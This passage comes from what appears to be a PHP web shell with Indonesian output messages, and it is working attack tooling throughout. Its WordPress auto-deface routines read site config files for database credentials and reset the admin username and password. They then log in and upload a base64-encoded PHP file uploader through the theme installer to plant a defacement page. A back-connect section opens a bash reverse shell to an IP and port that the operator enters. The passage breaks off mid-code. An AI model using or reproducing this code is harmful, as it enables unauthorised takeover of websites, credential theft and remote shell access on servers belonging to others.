if(preg_match("#$script#is", $bs)) { echo "[+] berhasil mepes...
"; echo "[+] $as

"; } else { echo "[-] gagal mepes...
"; echo "[!!] coba aja manual:
"; echo "[+] $target/wp-login.php
"; echo "[+] username: $user
"; echo "[+] password: $pass

"; } mysql_close($conn); } } } } else { echo "

WordPress Auto Deface




NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET[do] == auto_dwp2) { if($_POST[auto_deface_wp]) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,cookie.txt); curl_setopt($ch, CURLOPT_COOKIEFILE,cookie.txt); curl_setopt($ch, CURLOPT_COOKIESESSION,true); $data = curl_exec($ch); curl_close($ch); return $data; } function lohgin($cek, $web, $userr, $pass, $wp_submit) { $post = array( "log" => "$userr", "pwd" => "$pass", "rememberme" => "forever", "wp-submit" => "$wp_submit", "redirect_to" => "$web", "testcookie" => "1", ); $ch = curl_init($cek); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR,cookie.txt); curl_setopt($ch, CURLOPT_COOKIEFILE,cookie.txt); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode(" ", $_POST[link]); $script = htmlspecialchars($_POST[script]); $user = "indoxploit"; $pass = "indoxploit"; $passx = md5($pass); foreach($link as $dir_config) { $config = anucurl($dir_config); $dbhost = ambilkata($config,"DB_HOST, ",""); $dbuser = ambilkata($config,"DB_USER, ",""); $dbpass = ambilkata($config,"DB_PASSWORD, ",""); $dbname = ambilkata($config,"DB_NAME, ",""); $dbprefix = ambilkata($config,"table_prefix = ",""); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == ) { echo "[-] error, gabisa ambil nama domain nya
"; } else { echo "[+] $target
"; } $update = mysql_query("UPDATE $prefix SET user_login=$user,user_pass=$passx WHERE ID=$id"); if(!$conn OR !$db OR !$update) { echo "[-] MySQL Error: ".mysql_error()."

"; mysql_close($conn); } else { $site = "$target/wp-login.php"; $site2 = "$target/wp-admin/theme-install.php?upload"; $b1 = anucurl($site2); $wp_sub = ambilkata($b1, "id="wp-submit" class="button button-primary button-large" value="","" />"); $b = lohgin($site, $site2, $user, $pass, $wp_sub); $anu2 = ambilkata($b,"name="_wpnonce" value="","" />"); $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg=="); $www = "m.php"; $fp5 = fopen($www,"w"); fputs($fp5,$upload3); $post2 = array( "_wpnonce" => "$anu2", "_wp_http_referer" => "/wp-admin/theme-install.php?upload", "themezip" => "@$www", "install-theme-submit" => "Install Now", ); $ch = curl_init("$target/wp-admin/update.php?action=upload-theme"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); curl_setopt($ch, CURLOPT_COOKIEJAR,cookie.txt); curl_setopt($ch, CURLOPT_COOKIEFILE,cookie.txt); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data3 = curl_exec($ch); curl_close($ch); $y = date("Y"); $m = date("m"); $namafile = "id.php"; $fpi = fopen($namafile,"w"); fputs($fpi,$script); $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www"); curl_setopt($ch6, CURLOPT_POST, true); curl_setopt($ch6, CURLOPT_POSTFIELDS, array(file3=>"@$namafile")); curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch6, CURLOPT_COOKIEJAR,cookie.txt); curl_setopt($ch6, CURLOPT_COOKIESESSION,true); $postResult = curl_exec($ch6); curl_close($ch6); $as = "$target/k.php"; $bs = anucurl($as); if(preg_match("#$script#is", $bs)) { echo "[+] berhasil mepes...
"; echo "[+] $as

"; } else { echo "[-] gagal mepes...
"; echo "[!!] coba aja manual:
"; echo "[+] $target/wp-login.php
"; echo "[+] username: $user
"; echo "[+] password: $pass

"; } mysql_close($conn); } } } else { echo "

WordPress Auto Deface V.2

Link Config:


"; } } elseif($_GET[do] == network) { echo "
Back Connect:


"; if(isset($_POST[sub_bc])) { $ip = $_POST[ip_bc]; $port = $_POST[port_bc]; exe("/bin/bash -i >& /dev/tcp/$ip/$port 0>&1"); } echo "
"; } elseif($_GET[act] == newfile) { if($_POST[
184,-
 
fbt